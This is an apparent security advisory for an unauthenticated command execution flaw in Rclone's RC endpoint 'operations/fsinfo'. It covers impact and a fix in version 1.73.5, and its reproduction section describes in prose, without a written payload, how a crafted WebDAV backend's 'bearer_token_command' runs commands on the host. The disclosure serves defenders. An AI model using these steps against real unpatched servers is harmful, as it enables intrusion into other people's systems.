Rclone WebDAV Unauthenticated Command Execution Vulnerability via RC Endpoint

A vulnerability in Rclone's WebDAV backend allows for unauthenticated command execution on the host machine. This issue arises from the RC endpoint 'operations/fsinfo', which is exposed without authentication and accepts attacker-controlled input. When exploited, an attacker can instantiate a malicious WebDAV backend that executes commands through the 'bearer_token_command' option, leading to unauthorized command execution on the server.

Impact

Exploitation of this vulnerability allows for single-request unauthenticated command execution on the host where Rclone is running, within the context of the Rclone process. This could potentially lead to more severe outcomes, such as gaining shell access or manipulating files, depending on the server environment.

Reproduction

To reproduce this vulnerability, start an Rclone RC server without global HTTP authentication. Then, send a POST request to the 'operations/fsinfo' endpoint with a payload that includes a crafted WebDAV backend definition. The 'bearer_token_command' parameter should be set to a command that creates a file or marker on the system. If the command executes successfully, the vulnerability has been reproduced.

Remediation

Users can update to Rclone version 1.73.5 or later, where this vulnerability has been patched.